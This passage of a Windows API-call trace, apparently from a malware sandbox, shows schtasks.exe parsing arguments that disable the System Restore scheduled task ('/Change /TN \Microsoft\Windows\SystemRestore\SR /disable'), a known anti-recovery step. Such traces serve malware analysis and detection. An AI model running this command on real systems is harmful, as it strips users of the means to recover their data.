dwFlags=0x0, lpMem=0x1523d3dcf10) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dcf10) returned 0x48 [0107.578] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dcf10) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e0130) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e0130) returned 0x20 [0107.578] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e0130) returned 1 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] GetProcessHeap () returned 0x1523d3d0000 [0107.578] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df860) returned 1 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df860) returned 0x12 [0107.579] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df860) returned 1 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfd10) returned 1 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfd10) returned 0x20 [0107.579] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfd10) returned 1 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dbbe0) returned 1 [0107.579] GetProcessHeap () returned 0x1523d3d0000 [0107.579] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dbbe0) returned 0x18 [0107.579] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dbbe0) returned 1 [0107.580] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.580] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018 [0107.580] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b [0107.580] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b [0107.580] RtlVerifyVersionInfo (VersionInfo=0x1b4a07d9b0, TypeMask=0x3, ConditionMask=0x800000000001801b) returned 0x0 [0107.580] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.580] lstrlenW (lpString="change") returned 6 [0107.580] StrChrIW (lpStart="change", wMatch=0x7c) returned 0x0 [0107.580] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.580] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.580] lstrlenW (lpString="change") returned 6 [0107.580] GetProcessHeap () returned 0x1523d3d0000 [0107.580] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfd10 [0107.580] GetProcessHeap () returned 0x1523d3d0000 [0107.580] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df6e0 [0107.580] _memicmp (_Buf1=0x1523d3df6e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.580] GetProcessHeap () returned 0x1523d3d0000 [0107.580] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x16) returned 0x1523d3df800 [0107.580] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.580] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.580] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1523d3e09f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20 [0107.581] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\System32\\schtasks.exe", lpdwHandle=0x1b4a07db08 | out: lpdwHandle=0x1b4a07db08) returned 0x75c [0107.581] GetProcessHeap () returned 0x1523d3d0000 [0107.581] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x766) returned 0x1523d3e1910 [0107.581] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\System32\\schtasks.exe", dwHandle=0x0, dwLen=0x766, lpData=0x1523d3e1910 | out: lpData=0x1523d3e1910) returned 1 [0107.581] VerQueryValueW (in: pBlock=0x1523d3e1910, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b4a07daa0, puLen=0x1b4a07db00 | out: lplpBuffer=0x1b4a07daa0*=0x1523d3e1cb8, puLen=0x1b4a07db00) returned 1 [0107.581] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.581] _vsnwprintf (in: _Buffer=0x1523d3e09f0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x1b4a07da78 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0107.581] VerQueryValueW (in: pBlock=0x1523d3e1910, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x1b4a07da90, puLen=0x1b4a07daf8 | out: lplpBuffer=0x1b4a07da90*=0x1523d3e1ae8, puLen=0x1b4a07daf8) returned 1 [0107.581] lstrlenW (lpString="schtasks.exe") returned 12 [0107.581] lstrlenW (lpString="schtasks.exe") returned 12 [0107.581] lstrlenW (lpString=".EXE") returned 4 [0107.581] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0107.581] lstrlenW (lpString="schtasks.exe") returned 12 [0107.581] lstrlenW (lpString=".EXE") returned 4 [0107.581] lstrlenW (lpString="schtasks") returned 8 [0107.581] lstrlenW (lpString="/change") returned 7 [0107.581] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.581] _vsnwprintf (in: _Buffer=0x1523d3e09f0, _BufferCount=0x19, _Format="%s %s", _ArgList=0x1b4a07da78 | out: _Buffer="schtasks /change") returned 16 [0107.582] _memicmp (_Buf1=0x1523d3df900, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.582] GetProcessHeap () returned 0x1523d3d0000 [0107.582] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3e0040 [0107.582] _memicmp (_Buf1=0x1523d3df3e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.582] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1523d3e2bd0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0107.582] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0107.582] GetProcessHeap () returned 0x1523d3d0000 [0107.582] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x30) returned 0x1523d3d4cf0 [0107.582] _vsnwprintf (in: _Buffer=0x1523d3d5100, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x1b4a07da78 | out: _Buffer="Type \"SCHTASKS /CHANGE /?\" for usage.") returned 37 [0107.582] GetProcessHeap () returned 0x1523d3d0000 [0107.582] GetProcessHeap () returned 0x1523d3d0000 [0107.582] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e1910) returned 1 [0107.582] GetProcessHeap () returned 0x1523d3d0000 [0107.582] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e1910) returned 0x766 [0107.582] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e1910) returned 1 [0107.582] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.582] GetThreadLocale () returned 0x409 [0107.582] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.582] lstrlenW (lpString="change") returned 6 [0107.582] GetThreadLocale () returned 0x409 [0107.582] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.582] lstrlenW (lpString="?") returned 1 [0107.582] GetThreadLocale () returned 0x409 [0107.582] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.582] lstrlenW (lpString="s") returned 1 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="u") returned 1 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="p") returned 1 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="ru") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="rp") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="tn") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="tr") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="st") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="sd") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="ed") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="it") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="et") returned 2 [0107.583] GetThreadLocale () returned 0x409 [0107.583] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.583] lstrlenW (lpString="k") returned 1 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="du") returned 2 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="enable") returned 6 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="disable") returned 7 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="z") returned 1 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="ri") returned 2 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="rl") returned 2 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="delay") returned 5 [0107.584] GetThreadLocale () returned 0x409 [0107.584] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0107.584] lstrlenW (lpString="hresult") returned 7 [0107.584] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.584] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.584] lstrlenW (lpString="/Change") returned 7 [0107.584] lstrlenW (lpString="-/") returned 2 [0107.584] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.584] lstrlenW (lpString="change") returned 6 [0107.584] lstrlenW (lpString="change") returned 6 [0107.584] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.584] lstrlenW (lpString="Change") returned 6 [0107.584] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.584] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|change|") returned 8 [0107.584] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|Change|") returned 8 [0107.585] lstrlenW (lpString="|change|") returned 8 [0107.585] lstrlenW (lpString="|Change|") returned 8 [0107.585] StrStrIW (lpFirst="|change|", lpSrch="|Change|") returned="|change|" [0107.585] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.585] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.585] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.585] lstrlenW (lpString="/TN") returned 3 [0107.585] lstrlenW (lpString="-/") returned 2 [0107.585] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.585] lstrlenW (lpString="change") returned 6 [0107.585] lstrlenW (lpString="change") returned 6 [0107.585] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.585] lstrlenW (lpString="TN") returned 2 [0107.585] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.585] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|change|") returned 8 [0107.585] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.585] lstrlenW (lpString="|change|") returned 8 [0107.585] lstrlenW (lpString="|TN|") returned 4 [0107.585] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0107.585] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.585] lstrlenW (lpString="?") returned 1 [0107.585] lstrlenW (lpString="?") returned 1 [0107.585] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.585] lstrlenW (lpString="TN") returned 2 [0107.585] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.585] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|?|") returned 3 [0107.585] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.585] lstrlenW (lpString="|?|") returned 3 [0107.585] lstrlenW (lpString="|TN|") returned 4 [0107.585] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.585] lstrlenW (lpString="s") returned 1 [0107.585] lstrlenW (lpString="s") returned 1 [0107.585] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.585] lstrlenW (lpString="TN") returned 2 [0107.586] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|s|") returned 3 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.586] lstrlenW (lpString="|s|") returned 3 [0107.586] lstrlenW (lpString="|TN|") returned 4 [0107.586] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.586] lstrlenW (lpString="u") returned 1 [0107.586] lstrlenW (lpString="u") returned 1 [0107.586] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] lstrlenW (lpString="TN") returned 2 [0107.586] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|u|") returned 3 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.586] lstrlenW (lpString="|u|") returned 3 [0107.586] lstrlenW (lpString="|TN|") returned 4 [0107.586] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.586] lstrlenW (lpString="p") returned 1 [0107.586] lstrlenW (lpString="p") returned 1 [0107.586] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] lstrlenW (lpString="TN") returned 2 [0107.586] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|p|") returned 3 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.586] lstrlenW (lpString="|p|") returned 3 [0107.586] lstrlenW (lpString="|TN|") returned 4 [0107.586] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.586] lstrlenW (lpString="ru") returned 2 [0107.586] lstrlenW (lpString="ru") returned 2 [0107.586] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] lstrlenW (lpString="TN") returned 2 [0107.586] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.586] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|ru|") returned 4 [0107.587] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.587] lstrlenW (lpString="|ru|") returned 4 [0107.587] lstrlenW (lpString="|TN|") returned 4 [0107.587] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] lstrlenW (lpString="rp") returned 2 [0107.587] lstrlenW (lpString="rp") returned 2 [0107.587] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.587] lstrlenW (lpString="TN") returned 2 [0107.587] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.587] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|rp|") returned 4 [0107.587] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.587] lstrlenW (lpString="|rp|") returned 4 [0107.587] lstrlenW (lpString="|TN|") returned 4 [0107.587] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] lstrlenW (lpString="tn") returned 2 [0107.587] lstrlenW (lpString="tn") returned 2 [0107.587] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.587] lstrlenW (lpString="TN") returned 2 [0107.587] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.587] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|tn|") returned 4 [0107.587] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|TN|") returned 4 [0107.587] lstrlenW (lpString="|tn|") returned 4 [0107.587] lstrlenW (lpString="|TN|") returned 4 [0107.587] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.587] lstrlenW (lpString="-/") returned 2 [0107.587] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.587] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.588] StrChrIW (lpStart="\\Microsoft\\Windows\\SystemRestore\\SR", wMatch=0x3a) returned 0x0 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] lstrlenW (lpString="/disable") returned 8 [0107.588] lstrlenW (lpString="-/") returned 2 [0107.588] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0107.588] lstrlenW (lpString="change") returned 6 [0107.588] lstrlenW (lpString="change") returned 6 [0107.588] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.588] lstrlenW (lpString="disable") returned 7 [0107.588] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.588] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|change|") returned 8 [0107.588] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.588] lstrlenW (lpString="|change|") returned 8 [0107.588] lstrlenW (lpString="|disable|") returned 9 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] lstrlenW (lpString="?") returned 1 [0107.588] lstrlenW (lpString="?") returned 1 [0107.588] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.588] lstrlenW (lpString="disable") returned 7 [0107.588] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.588] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|?|") returned 3 [0107.588] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.588] lstrlenW (lpString="|?|") returned 3 [0107.588] lstrlenW (lpString="|disable|") returned 9 [0107.588] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.588] lstrlenW (lpString="s") returned 1 [0107.589] lstrlenW (lpString="s") returned 1 [0107.589] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] lstrlenW (lpString="disable") returned 7 [0107.589] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|s|") returned 3 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.589] lstrlenW (lpString="|s|") returned 3 [0107.589] lstrlenW (lpString="|disable|") returned 9 [0107.589] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.589] lstrlenW (lpString="u") returned 1 [0107.589] lstrlenW (lpString="u") returned 1 [0107.589] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] lstrlenW (lpString="disable") returned 7 [0107.589] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|u|") returned 3 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.589] lstrlenW (lpString="|u|") returned 3 [0107.589] lstrlenW (lpString="|disable|") returned 9 [0107.589] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.589] lstrlenW (lpString="p") returned 1 [0107.589] lstrlenW (lpString="p") returned 1 [0107.589] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] lstrlenW (lpString="disable") returned 7 [0107.589] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|p|") returned 3 [0107.589] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.589] lstrlenW (lpString="|p|") returned 3 [0107.589] lstrlenW (lpString="|disable|") returned 9 [0107.589] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.589] lstrlenW (lpString="ru") returned 2 [0107.589] lstrlenW (lpString="ru") returned 2 [0107.589] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.589] lstrlenW (lpString="disable") returned 7 [0107.590] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|ru|") returned 4 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df240, 